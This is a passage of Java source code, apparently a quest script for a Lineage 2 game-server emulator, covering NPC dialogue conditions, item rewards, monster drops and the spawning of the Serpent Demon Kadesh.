st.exitQuest(false); } break; case SIR_ARON_TANFORD: if (cond == 2) htmltext = "30653-01.htm"; else if (cond > 2) htmltext = "30653-03.htm"; break; case VOKIAN: if (cond == 5) htmltext = "30514-01.htm"; else if (cond == 6) htmltext = "30514-03.htm"; else if (cond == 7) { htmltext = "30514-04.htm"; st.setCond(8); playSound(player, SOUND_MIDDLE); takeItems(player, TALISMAN_OF_SNAKE, 1); } else if (cond > 7) htmltext = "30514-05.htm"; break; case GAUEN: if (cond == 9) { htmltext = "30717-01.htm"; st.setCond(10); playSound(player, SOUND_MIDDLE); takeItems(player, HAMIL_LETTER_3, 1); } else if (cond == 10) htmltext = "30717-03.htm"; else if (cond == 11) { htmltext = "30717-02.htm"; st.setCond(12); playSound(player, SOUND_MIDDLE); takeItems(player, MANASHEN_HORN, 1); takeItems(player, MITHRIL_CLIP, 1); takeItems(player, REINFORCED_BOWSTRING, 1); takeItems(player, STAKATO_CHITIN, 1); giveItems(player, CRESCENT_MOON_BOW, 1); giveItems(player, WOODEN_ARROW, 10); } else if (cond > 11) htmltext = "30717-04.htm"; break; } break; case COMPLETED: htmltext = getAlreadyCompletedMsg(); break; } return htmltext; } @Override public void onMyDying(Npc npc, Creature killer) { final Player player = killer.getActingPlayer(); final QuestState st = checkPlayerState(player, npc, QuestStatus.STARTED); if (st == null) return; switch (npc.getNpcId()) { case ANT: case ANT_CAPTAIN: case ANT_OVERSEER: case ANT_RECRUIT: case ANT_PATROL: case ANT_GUARD: case NOBLE_ANT: case NOBLE_ANT_LEADER: if (st.getCond() == 3 && dropItems(player, HUNTER_RUNE_1, 1, 10, 500000)) st.setCond(4); break; case BREKA_ORC_SHAMAN: case BREKA_ORC_OVERLORD: if (st.getCond() == 6 && dropItems(player, HUNTER_RUNE_2, 1, 10, 500000)) { st.setCond(7); giveItems(player, TALISMAN_OF_SNAKE, 1); } break; case MARSH_STAKATO_WORKER: case MARSH_STAKATO_SOLDIER: case MARSH_STAKATO_DRONE: if (st.getCond() == 10 && dropItems(player, STAKATO_CHITIN, 1, 1, 100000) && player.getInventory().hasItems(MANASHEN_HORN, MITHRIL_CLIP, REINFORCED_BOWSTRING)) st.setCond(11); break; case MARSH_SPIDER: if (st.getCond() == 10 && dropItems(player, REINFORCED_BOWSTRING, 1, 1, 100000) && player.getInventory().hasItems(MANASHEN_HORN, MITHRIL_CLIP, STAKATO_CHITIN)) st.setCond(11); break; case ROAD_SCAVENGER: if (st.getCond() == 10 && dropItems(player, MITHRIL_CLIP, 1, 1, 100000) && player.getInventory().hasItems(MANASHEN_HORN, REINFORCED_BOWSTRING, STAKATO_CHITIN)) st.setCond(11); break; case MANASHEN_GARGOYLE: if (st.getCond() == 10 && dropItems(player, MANASHEN_HORN, 1, 1, 100000) && player.getInventory().hasItems(REINFORCED_BOWSTRING, MITHRIL_CLIP, STAKATO_CHITIN)) st.setCond(11); break; case LETO_LIZARDMAN: case LETO_LIZARDMAN_ARCHER: case LETO_LIZARDMAN_SOLDIER: case LETO_LIZARDMAN_WARRIOR: case LETO_LIZARDMAN_SHAMAN: case LETO_LIZARDMAN_OVERLORD: if (st.getCond() == 13) { if (((player.getInventory().getItemCount(BLOOD_OF_LIZARDMAN) - 120) * 5) > Rnd.get(100)) { playSound(player, SOUND_BEFORE_BATTLE); takeItems(player, BLOOD_OF_LIZARDMAN, -1); addSpawn(SERPENT_DEMON_KADESH, player, false, 300000, true); } else dropItemsAlways(player, BLOOD_OF_LIZARDMAN, 1, 0); } break; case SERPENT_DEMON_KADESH: if (st.getCond() == 13) { if (player.getInventory().getItemIdFrom(Paperdoll.RHAND) == CRESCENT_MOON_BOW) { st.setCond(14); playSound(player, SOUND_MIDDLE); giveItems(player, TALISMAN_OF_KADESH, 1); } else addSpawn(SERPENT_DEMON_KADESH, player, false, 300000, true); } break; } } }  
×
×
  • Criar Novo...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.